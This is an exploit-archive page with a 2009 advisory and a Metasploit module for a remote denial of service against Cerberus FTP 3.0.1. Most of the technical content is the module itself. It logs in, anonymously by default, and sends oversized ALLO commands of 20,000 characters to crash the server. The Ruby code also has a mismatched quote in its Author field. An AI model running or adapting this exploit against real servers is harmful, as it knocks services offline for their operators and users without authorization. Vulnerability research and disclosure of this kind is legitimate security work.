Cerberus FTP 3.0.1 Denial Of Service

Cerberus FTP 3.0.1 Denial Of Service: Posted Aug 25, 2009; Authored by Francis Provencher; This Metasploit module demonstrates a denial of service vulnerability in Cerberus FTP version 3.0.1.; tags | exploit, denial of service; SHA-256 | 621add859617c0ef4bfb5e79dc73602f8b35eaa7a0388641e11446fcb5ebbb55; Download | Favorite | View

Cerberus FTP 3.0.1 Denial Of Service

#####################################################################################

Application:  Cerberus FTP 3.0.1
            
Platforms:    Windows XP Professional SP2

crash:        N/A
  
Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
             

#####################################################################################

1) Introduction
2) Technical details
3) The Code


#####################################################################################

===============
1) Introduction

===============
Cerberus FTP Server is a secure and easy-to-use professional Windows FTP server featuring FIPS 140-2 certified encryption.

#####################################################################################

============================
2) Technical details 
============================

The validation of some ftp commands are not made by the server. This lead to a a DoS.... 



#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos
  
  def initialize(info = {})
    super(update_info(info,  
      'Name'           => 'Cerberus FTP command ALLO overflow',
      'Description'    => %q{
         You need to have a valid login
        so you can run ALLO command.
      },
      'Author'         => 'Francis Provencher "Protek Research Lab's",
      'License'        => MSF_LICENSE,
      'Version'        => '1',
      'References'     =>
        
      'DisclosureDate' => 'Aug 24 2009'))

    # They're required
    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
    ])
  end

  def run
    return unless connect_login

    print_status("Sending commands...")

    # We want to try to wait for responses to these
    raw_send("ALLO #{'A' * 20000}\r\n")
    raw_send("ALLO #{'A' * 20000}\r\n")

    disconnect
  end
end


#####################################################################################

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Cerberus FTP 3.0.1 Denial Of Service

Cerberus FTP 3.0.1 Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Cerberus FTP 3.0.1 Denial Of Service

Share This

Cerberus FTP 3.0.1 Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems